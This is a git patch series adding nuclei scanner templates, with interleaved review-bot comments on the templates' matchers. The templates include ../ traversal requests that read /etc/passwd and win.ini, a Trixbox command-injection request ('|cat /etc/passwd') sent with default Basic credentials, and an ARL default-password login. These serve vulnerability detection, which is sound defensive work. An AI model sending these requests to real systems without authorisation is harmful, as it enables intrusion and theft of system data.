<39673284+Udyz@users.noreply.github.com> Date: Mon, 31 May 2021 14:23:44 +0700 Subject: [PATCH 029/144] Create wp-statistics-blindsql.yaml --- .../wordpress/wp-statistics-blindsql.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-statistics-blindsql.yaml diff --git a/vulnerabilities/wordpress/wp-statistics-blindsql.yaml b/vulnerabilities/wordpress/wp-statistics-blindsql.yaml new file mode 100644 index 0000000000..3fc6f4af66 --- /dev/null +++ b/vulnerabilities/wordpress/wp-statistics-blindsql.yaml 
@@ -0,0 +1,32 @@ +id: WP-Statistics-BlindSQL +info: + name: WordPress Plugin WP Statistics 13.0-.7 - Unauthenticated Time-Based Blind SQL Injection + author: lotusdll + severity: critical + description: The WP Statistic WordPress plugin was affected by an Unauthenticated Time-Based Blind SQL Injection security vulnerability. + reference: | + - https://www.exploit-db.com/exploits/49894 + - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/ + - https://github.com/Udyz/WP-Statistics-BlindSQL + tags: unauth,blindsql,wordpress + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "WP Statistics" + part: body + + - type: regex + regex: + - 'Stable tag\: [1][3]\.[0].([1]|[2]|[3]|[4]|[5]|[6]|[7])|[1][3]\.[0]' + part: body From 70b03b9958d0413f893a69d708254c5faa8d0886 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 13:02:17 +0530 Subject: [PATCH 030/144] Added lancom-router-panel --- exposed-panels/lancom-router-panel.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/lancom-router-panel.yaml diff --git a/exposed-panels/lancom-router-panel.yaml b/exposed-panels/lancom-router-panel.yaml new file mode 100644 index 0000000000..6faaf29400 --- /dev/null +++ b/exposed-panels/lancom-router-panel.yaml @@ -0,0 +1,22 @@ +id: lancom-router-panel + +info: + name: Lancom Router Panel + author: __Fazal + severity: info + tags: panel,lancom + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "LANCOM 1790VA-4G" \ No newline at end of file From 7eaa44b1c6cdbea3128c812c99626dbf7005c0aa Mon Sep 17 00:00:00 2001 
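Review bot: The version regex `'Stable tag\: [1][3]\.[0].([1]|[2]|[3]|[4]|[5]|[6]|[7])|[1][3]\.[0]'` has a top-level alternation, so the `Stable tag:` prefix applies only to the left branch and the right branch matches a bare `13.0` anywhere in the readme (including as a prefix of `13.08`), while the unescaped `.` before the group matches any character. A tighter form that pins the line and the 13.0–13.0.7 range is `- '(?m)^Stable tag: 13\.0(\.[0-7])?\s*$'`; note that PATCH 032 appends `$` to the right branch only, and nuclei compiles matchers with Go's regexp, where `$` is end-of-text unless `(?m)` is set, so that change would make the right branch match only a readme that ends in `13.0` (worth confirming on a live install). The `id: WP-Statistics-BlindSQL` breaks the lowercase kebab-case id convention every other template in this series follows (`wp-statistics-blindsql`). Since the template only infers the version from `readme.txt` and never exercises the injection, the `description` should say so, because a `critical` finding from a version string alone is otherwise easy to over-read.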
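Review bot: The only body word in lancom-router-panel.yaml is `LANCOM 1790VA-4G`, a single router model, while the template is named `Lancom Router Panel` and tagged `panel,lancom`, so every other LANCOM device is missed. Either rename the template to the model it detects or match a vendor-wide marker from the login page; I cannot name such a marker from the hunk, so it needs checking against a device.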
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 13:09:04 +0530 Subject: [PATCH 031/144] Added clave-login-panel --- exposed-panels/clave-login-panel.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/clave-login-panel.yaml diff --git a/exposed-panels/clave-login-panel.yaml b/exposed-panels/clave-login-panel.yaml new file mode 100644 index 0000000000..6b10058d50 --- /dev/null +++ b/exposed-panels/clave-login-panel.yaml @@ -0,0 +1,23 @@ +id: clave-login-panel + +info: + name: Clave login panel + author: __Fazal + severity: info + tags: panel,clave + +requests: + - method: GET + path: + - '{{BaseURL}}/admin.php' + + redirects: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Clave" \ No newline at end of file From 2b1a39cbab61a2f6eae1eca53eefa0d3a1f3b8a0 Mon Sep 17 00:00:00 2001 From: lulz <39673284+Udyz@users.noreply.github.com> Date: Mon, 31 May 2021 14:39:15 +0700 Subject: [PATCH 032/144] Update wp-statistics-blindsql.yaml --- vulnerabilities/wordpress/wp-statistics-blindsql.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-statistics-blindsql.yaml b/vulnerabilities/wordpress/wp-statistics-blindsql.yaml index 3fc6f4af66..40730242cd 100644 --- a/vulnerabilities/wordpress/wp-statistics-blindsql.yaml +++ b/vulnerabilities/wordpress/wp-statistics-blindsql.yaml @@ -28,5 +28,5 @@ requests: - type: regex regex: - - 'Stable tag\: [1][3]\.[0].([1]|[2]|[3]|[4]|[5]|[6]|[7])|[1][3]\.[0]' + - 'Stable tag\: [1][3]\.[0].([1]|[2]|[3]|[4]|[5]|[6]|[7])|[1][3]\.[0]$' part: body From 2aab1993e095e99cee8d28e4996d73f4163092a5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 07:39:56 +0000 Subject: [PATCH 033/144] Auto Update README [Mon May 31 07:39:56 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
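Review bot: With `redirects: true` the request to `/admin.php` in clave-login-panel.yaml can land on an arbitrary page, and the only content check is the bare word `Clave` with a 200, so any page containing that word (it is also the Spanish word for password and a common form label) is reported as the panel. A longer string from the panel's title or login form would make the match specific; I cannot name it from the hunk, so it needs confirming against a live instance.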
diff --git a/README.md b/README.md index 0cacc956a9..ce06ce9566 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 321 | vulnerabilities | 171 | exposed-panels | 139 | +| cves | 321 | vulnerabilities | 171 | exposed-panels | 140 | | takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 29 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**109 directories, 1175 files**. +**109 directories, 1176 files**. From 4474785111bb9c1228ba5de5c82e7e962289b5ef Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 07:40:50 +0000 Subject: [PATCH 034/144] Auto Update README [Mon May 31 07:40:50 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ce06ce9566..6a2cc89ce2 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 321 | vulnerabilities | 171 | exposed-panels | 140 | +| cves | 321 | vulnerabilities | 171 | exposed-panels | 141 | | takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 29 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**109 directories, 1176 files**. +**109 directories, 1177 files**. 
From 5fed1d3432d794cc92d682480c93ae1f9e4bfa5e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 13:31:13 +0530 Subject: [PATCH 035/144] Improved matcher --- vulnerabilities/wordpress/wordpress-db-repair.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wordpress-db-repair.yaml b/vulnerabilities/wordpress/wordpress-db-repair.yaml index 56d2049ebd..7c9d635e19 100644 --- a/vulnerabilities/wordpress/wordpress-db-repair.yaml +++ b/vulnerabilities/wordpress/wordpress-db-repair.yaml @@ -16,7 +16,7 @@ requests: matchers: - type: word words: - - "WordPress › Database Repair" + - "WordPress" - type: word words: From 2ad903dcf1082c13ba39dc335dcc95524a478b94 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 14:19:23 +0530 Subject: [PATCH 036/144] misc changes --- .../other/hjtcloud-arbitrary-file-read.yaml | 11 ++++------- .../other/hjtcloud-rest-arbitrary-file-read.yaml | 13 ++++++++----- 2 files changed, 12 insertions(+), 12 deletions(-) rename exposures/configs/hjtcloud-information-disclosure.yaml => vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml (52%) diff --git a/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml b/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml index 264e1a0ca0..d12090b6ae 100644 --- a/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml +++ b/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml @@ -27,19 +27,16 @@ requests: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 20 - fullPath=/Windows/win.ini + fullPath=/Windows/win.ini matchers-condition: and matchers: - type: regex regex: - - "root:[x*]:0:0" - - - type: word - words: - - "extensions" - part: body + - "root:[x*]:0:0:" + - "bit app support" + condition: or - type: status status: 
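Review bot: Loosening the word from `WordPress › Database Repair` to the bare `WordPress` makes this matcher fire on every WordPress page, so the template now depends entirely on the second word matcher, which lies outside the hunk. If the motivation was that the live page encodes the separator (`WordPress &rsaquo; Database Repair`), keep a token that is still specific to the repair screen, e.g. `- "Database Repair"`, rather than the product name alone. The enclosing `matchers:` block continues outside the hunk.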
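Review bot: The context line `Content-Length: 20` does not match the `fullPath=/Windows/win.ini` body this hunk keeps, which is 25 bytes. As far as I can tell nuclei's default (non-`unsafe`) mode lets Go's HTTP client recompute the length from the body, so the stale value is ignored at runtime, but anyone replaying the raw request by hand gets a truncated body; either drop the header or set `Content-Length: 25`. The request definition starts outside the hunk, so I could not confirm how the request is declared.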
diff --git a/exposures/configs/hjtcloud-information-disclosure.yaml b/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml similarity index 52% rename from exposures/configs/hjtcloud-information-disclosure.yaml rename to vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml index 2cb19bf1f5..e6c73c79e9 100644 --- a/exposures/configs/hjtcloud-information-disclosure.yaml +++ b/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml @@ -1,24 +1,27 @@ -id: hjtcloud-information-disclosure +id: hjtcloud-arbitrary-file-read info: - name: HJTcloud Information Disclosure + name: HJTcloud Arbitrary file read author: pikpikcu severity: low reference: https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw - tags: hjtcloud,exposure,config + tags: hjtcloud,lfi requests: - method: GET path: - - "{{BaseURL}}//him/api/rest/V1.0/system/log/list?filePath=../" + - "{{BaseURL}}/him/api/rest/V1.0/system/log/list?filePath=../" matchers-condition: and matchers: - type: word words: - - "/var/logs/../logs/" + - "name" + - "length" + - "filePath" + condition: and - type: status status: From e56a64402cce02dfa79ab4aabd46d399ebb2b4c8 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 31 May 2021 08:56:01 +0000 Subject: [PATCH 037/144] Create ns-asg-file-read.yaml --- vulnerabilities/other/ns-asg-file-read.yaml | 26 +++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 vulnerabilities/other/ns-asg-file-read.yaml diff --git a/vulnerabilities/other/ns-asg-file-read.yaml b/vulnerabilities/other/ns-asg-file-read.yaml new file mode 100644 index 0000000000..8fb79f6637 --- /dev/null +++ b/vulnerabilities/other/ns-asg-file-read.yaml 
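Review bot: The renamed file `hjtcloud-rest-arbitrary-file-read.yaml` is given `id: hjtcloud-arbitrary-file-read`, which is the id already carried by `vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml` edited in the previous commit, and nuclei keys templates by id, so one of the two will be reported under the other's name or flagged as a duplicate. Set `id: hjtcloud-rest-arbitrary-file-read` to match the filename. The new tokens `name`, `length` and `filePath` are generic JSON field names even under `condition: and`; adding `part: body` keeps the match from being satisfied by header content.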
@@ -0,0 +1,26 @@ +id: ns-asg-file-read + +info: + name: NS ASG File Read + author: pikpikcu + severity: high + reference: http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E7%BD%91%E5%BA%B7%20NS-ASG%E5%AE%89%E5%85%A8%E7%BD%91%E5%85%B3/%E7%BD%91%E5%BA%B7%20NS-ASG%E5%AE%89%E5%85%A8%E7%BD%91%E5%85%B3%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + tags: ns-asg,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php" + - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + - "$certfile" + + - type: status + status: + - 200 From 1fc0136ba67c8f3626efc6b4bc95b4f4527ffbb9 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 31 May 2021 08:57:34 +0000 Subject: [PATCH 038/144] Auto Update README [Mon May 31 08:57:34 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 6a2cc89ce2..85dd57d210 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 321 | vulnerabilities | 171 | exposed-panels | 141 | +| cves | 321 | vulnerabilities | 173 | exposed-panels | 141 | | takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 29 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**109 directories, 1177 files**. +**109 directories, 1179 files**. </td> </tr> From 7b8f05e8597e01dca70d1c52ee06e67652150032 Mon Sep 17 00:00:00 2001 
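Review bot: The second regex `"$certfile"` can never match: in RE2 an unescaped `$` is an end-of-text anchor, so `$certfile` demands characters after the end of the response. Escape it so the PHP variable name from the first request (which downloads `cert_download.php` itself) is actually detected, e.g. `- '\$certfile'` in single quotes or `- "\\$certfile"`. Because the two regexes sit under the default `or` condition, the template as written fires only when `/etc/passwd` is readable and the source-disclosure path contributes nothing.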
From: Pramod Sargar <41449799+impramodsargar@users.noreply.github.com> Date: Mon, 31 May 2021 14:42:57 +0530 Subject: [PATCH 039/144] synnefo admin panel added --- exposed-panels/synnefo-admin-panel.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/synnefo-admin-panel.yaml diff --git a/exposed-panels/synnefo-admin-panel.yaml b/exposed-panels/synnefo-admin-panel.yaml new file mode 100644 index 0000000000..95d578ef2e --- /dev/null +++ b/exposed-panels/synnefo-admin-panel.yaml @@ -0,0 +1,22 @@ +id: synnefo-admin-panel + +info: + name: Synnefo Admin Panel Exposure + author: impramodsargar + severity: info + tags: panel + +requests: + - method: GET + path: + - "{{BaseURL}}/synnefoclient/" + + matchers-condition: and + matchers: + - type: word + words: + - '<title>Synnefo Admin' + + - type: status + status: + - 200 From 06918a764db53efddc2076467f017007563c36e0 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 31 May 2021 09:15:57 +0000 Subject: [PATCH 040/144] Create arl-default-password.yaml --- default-logins/arl/arl-default-password.yaml | 27 ++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 default-logins/arl/arl-default-password.yaml diff --git a/default-logins/arl/arl-default-password.yaml b/default-logins/arl/arl-default-password.yaml new file mode 100644 index 0000000000..935db2e5ed --- /dev/null +++ b/default-logins/arl/arl-default-password.yaml @@ -0,0 +1,27 @@ +id: arl-default-password + +info: + name: ARL Default Password + author: pikpikcu + severity: high + tags: arl,default-login + +requests: + - method: POST + path: + - "{{BaseURL}}/api/user/login" + headers: + Content-Type: application/json; charset=UTF-8 + body: | + {"username":"admin","password":"arlpass"} + + matchers-condition: and + matchers: + + - type: word + words: + - '\"token\":' + + - type: status + status: + - 200 
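Review bot: The arl-default-password word `'\"token\":'` is single-quoted YAML, where backslashes are literal, so the matcher looks for the six characters `\"token\":` including the backslashes, which a JSON login response (`{"token":...}`) never contains; the template can only fail. Write it as `- '"token":'` (no escaping is needed inside single quotes) or use a `type: regex` matcher. Since the body is a default credential pair, a `description:` stating that a hit means `admin:arlpass` is accepted would help triage.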
From f43937e5c1200daea4e5f744efa66004fb88dbf7 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 14:57:05 +0530 Subject: [PATCH 041/144] Update synnefo-admin-panel.yaml --- exposed-panels/synnefo-admin-panel.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/exposed-panels/synnefo-admin-panel.yaml b/exposed-panels/synnefo-admin-panel.yaml index 95d578ef2e..221969aaca 100644 --- a/exposed-panels/synnefo-admin-panel.yaml +++ b/exposed-panels/synnefo-admin-panel.yaml @@ -1,6 +1,6 @@ id: synnefo-admin-panel -info: +info: name: Synnefo Admin Panel Exposure author: impramodsargar severity: info @@ -13,10 +13,10 @@ requests: matchers-condition: and matchers: - - type: word - words: + - type: word + words: - 'Synnefo Admin' - type: status - status: + status: - 200 From a7d10053f0b5b5f2df195cd39e03e3351db1b0a7 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 14:58:06 +0530 Subject: [PATCH 042/144] Added tags --- exposed-panels/synnefo-admin-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/synnefo-admin-panel.yaml b/exposed-panels/synnefo-admin-panel.yaml index 221969aaca..9a79f3b8da 100644 --- a/exposed-panels/synnefo-admin-panel.yaml +++ b/exposed-panels/synnefo-admin-panel.yaml @@ -4,7 +4,7 @@ info: name: Synnefo Admin Panel Exposure author: impramodsargar severity: info - tags: panel + tags: panel,synnefo requests: - method: GET From f944191e7a9d5eeeec0a4dbe32652072e6943623 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 31 May 2021 09:29:51 +0000 Subject: [PATCH 043/144] Create blue-ocean-excellence-lfi.yaml --- .../other/blue-ocean-excellence-lfi.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 vulnerabilities/other/blue-ocean-excellence-lfi.yaml 
diff --git a/vulnerabilities/other/blue-ocean-excellence-lfi.yaml b/vulnerabilities/other/blue-ocean-excellence-lfi.yaml new file mode 100644 index 0000000000..cb2c86fa77 --- /dev/null +++ b/vulnerabilities/other/blue-ocean-excellence-lfi.yaml @@ -0,0 +1,24 @@ +id: blue-ocean-excellence-lfi + +info: + name: Blue Ocean Excellence LFI + author: pikpikcu + severity: medium + reference: https://blog.csdn.net/qq_41901122/article/details/116786883 + tags: blue-ocean,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/download.php?file=../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "toot:[x*]:0:0" + + - type: status + status: + - 200 From 57b000ae000966266f3994d835d14420cd835ff1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 09:30:46 +0000 Subject: [PATCH 044/144] Auto Update README [Mon May 31 09:30:46 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 85dd57d210..23998ce2ac 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 321 | vulnerabilities | 173 | exposed-panels | 141 | +| cves | 321 | vulnerabilities | 173 | exposed-panels | 142 | | takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 29 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**109 directories, 1179 files**. +**109 directories, 1180 files**. From 014054485a43a927d1e28e181ae80c1ae7e62eed Mon Sep 17 00:00:00 2001 
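Review bot: The regex `toot:[x*]:0:0` is a typo and will not match the `root:x:0:0` line of `/etc/passwd`, so the template never fires even on a vulnerable host; it should be `- "root:[x*]:0:0"`, the pattern the other file-read templates in this batch use. Severity `medium` for an unauthenticated arbitrary file read also sits oddly next to `ns-asg-file-read`, which rates the same class of issue `high`.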
From: Prince Chaddha Date: Mon, 31 May 2021 15:16:17 +0530 Subject: [PATCH 045/144] Update arl-default-password.yaml --- default-logins/arl/arl-default-password.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/default-logins/arl/arl-default-password.yaml b/default-logins/arl/arl-default-password.yaml index 935db2e5ed..6bf1cd4ca8 100644 --- a/default-logins/arl/arl-default-password.yaml +++ b/default-logins/arl/arl-default-password.yaml @@ -20,7 +20,9 @@ requests: - type: word words: - - '\"token\":' + - '"message": "success"' + - '"username": "admin"' + - '"type": "login"' - type: status status: From b0eca52c4b4a5094d63c33cbeadcbec545fe1598 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 31 May 2021 09:46:53 +0000 Subject: [PATCH 046/144] Create CVE-2017-14535.yaml --- cves/2017/CVE-2017-14535.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2017/CVE-2017-14535.yaml diff --git a/cves/2017/CVE-2017-14535.yaml b/cves/2017/CVE-2017-14535.yaml new file mode 100644 index 0000000000..1d890e7405 --- /dev/null +++ b/cves/2017/CVE-2017-14535.yaml @@ -0,0 +1,32 @@ +id: CVE-2017-14535 + +info: + name: Trixbox 2.8.0.4 Remote Code Execution + author: pikpikcu + severity: high + reference: https://www.exploit-db.com/exploits/49913 + tags: trixbox,rce + +requests: + - raw: + - | + POST /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1 + Host: {{Hostname}} + User-Agent: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: de,en-US;q=0.7,en;q=0.3 + Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= + Connection: close + Upgrade-Insecure-Requests: 1 + Cache-Control: max-age=0 + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 
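Review bot: The three new words are left under the default `or` condition, so a response containing just `"username": "admin"` — which an error reply that echoes the submitted user can produce — counts as a successful default login. Add `condition: and` beneath `words:` so all three fragments are required together. The surrounding `matchers:` block starts outside the hunk.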
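Review bot: The CVE-2017-14535 request only succeeds with the hard-coded `Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=` (which decodes to `maint:password`), so the template really detects hosts still on Trixbox's default maintenance credentials and then runs `cat /etc/passwd` through the `lang` parameter; that precondition belongs in a `description:` so scan output is not read as an unauthenticated RCE. The `User-Agent` line also has its name doubled (`User-Agent: User-Agent: Mozilla/...`), which is sent verbatim as the header value. Given the referenced exploit yields command execution, `severity: critical` may be more accurate than `high`.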
From 4887efee041998477c55c56575edd9b0280b52ae Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 31 May 2021 15:22:14 +0530 Subject: [PATCH 047/144] Update arl-default-password.yaml --- default-logins/arl/arl-default-password.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/arl/arl-default-password.yaml b/default-logins/arl/arl-default-password.yaml index 6bf1cd4ca8..08f426e7da 100644 --- a/default-logins/arl/arl-default-password.yaml +++ b/default-logins/arl/arl-default-password.yaml @@ -23,7 +23,7 @@ requests: - '"message": "success"' - '"username": "admin"' - '"type": "login"' - + condition: and - type: status status: - 200 From 378b4fcf81e8ff5f32fd5d0a362ef2d565c485b5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 09:54:32 +0000 Subject: [PATCH 049/144] Auto Update README [Mon May 31 09:54:32 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 23998ce2ac..9d6cde8f68 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,10 @@ An overview of the nuclei template directory including number of templates assoc | cves | 321 | vulnerabilities | 173 | exposed-panels | 142 | | takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | -| default-logins | 29 | exposed-tokens | 0 | dns | 9 | +| default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**109 directories, 1180 files**. +**110 directories, 1181 files**. From f75748d6ffba133736a1fdb6dea032ea65b2d2d3 Mon Sep 17 00:00:00 2001 From: Pramod Sargar <41449799+impramodsargar@users.noreply.github.com> Date: Mon, 31 May 2021 15:39:58 +0530 Subject: [PATCH 050/144] OpenERP database instances detection added --- .../openerp-database-instances-detect.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 technologies/openerp-database-instances-detect.yaml 
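Review bot: With `condition: and` the match now depends on all three fragments appearing with exactly one space after each colon (`"message": "success"`), so a server that emits compact JSON (`"message":"success"`) is reported as not vulnerable even though the login succeeded. A `type: regex` matcher with `"message":\s*"success"` (and likewise for the other two keys) tolerates either serialization. The `condition: and` line also replaced the blank line that separated this matcher from the `type: status` one; keep the blank line for readability.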
diff --git a/technologies/openerp-database-instances-detect.yaml b/technologies/openerp-database-instances-detect.yaml new file mode 100644 index 0000000000..38c10b6122 --- /dev/null +++ b/technologies/openerp-database-instances-detect.yaml @@ -0,0 +1,22 @@ +id: OpenERP-database-instances + +info: + name: OpenERP database instances + author: impramodsargar + severity: info + tags: database + +requests: + - method: GET + path: + - "{{BaseURL}}/web/database/selector/" + + matchers-condition: and + matchers: + - type: word + words: + - 'Odoo' + + - type: status + status: + - 200 From 31341b547eeea55a81693d948d6cc83b00d2d2d9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 31 May 2021 15:44:21 +0530 Subject: [PATCH 051/144] Update blue-ocean-excellence-lfi.yaml --- vulnerabilities/other/blue-ocean-excellence-lfi.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/blue-ocean-excellence-lfi.yaml b/vulnerabilities/other/blue-ocean-excellence-lfi.yaml index cb2c86fa77..dffb6b050f 100644 --- a/vulnerabilities/other/blue-ocean-excellence-lfi.yaml +++ b/vulnerabilities/other/blue-ocean-excellence-lfi.yaml @@ -3,7 +3,7 @@ id: blue-ocean-excellence-lfi info: name: Blue Ocean Excellence LFI author: pikpikcu - severity: medium + severity: high reference: https://blog.csdn.net/qq_41901122/article/details/116786883 tags: blue-ocean,lfi @@ -17,7 +17,7 @@ requests: - type: regex regex: - - "toot:[x*]:0:0" + - "toor:[x*]:0:0" - type: status status: From 57e24e9db1245dc401b1d40ef233db3be29b7cb2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 10:15:26 +0000 Subject: [PATCH 052/144] Auto Update README [Mon May 31 10:15:26 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 9d6cde8f68..74c5dd9066 100644 --- a/README.md +++ b/README.md 
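Review bot: The only content check in openerp-database-instances-detect is the word `Odoo`, which appears on every page of an Odoo/OpenERP instance, so this fires whenever `/web/database/selector/` returns any 200 — not specifically when the database manager is exposed, and a server with the manager disabled may still answer 200 with a generic page. Match a token from the selector UI itself (the database list or the create/backup/restore controls, verified against a live instance) and set `part: body`. The `id: OpenERP-database-instances` also breaks the lowercase-id convention of the other templates and does not match the filename.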
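Review bot: `toor:[x*]:0:0` still does not match `/etc/passwd` — the superuser entry is `root:x:0:0` on Linux, and `toor` is only an optional secondary account on some BSDs — so the blue-ocean regex is still broken after this fix. Use `- "root:[x*]:0:0"`, the pattern the other file-read templates in this series rely on. The `matchers:` block containing it starts outside the hunk.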
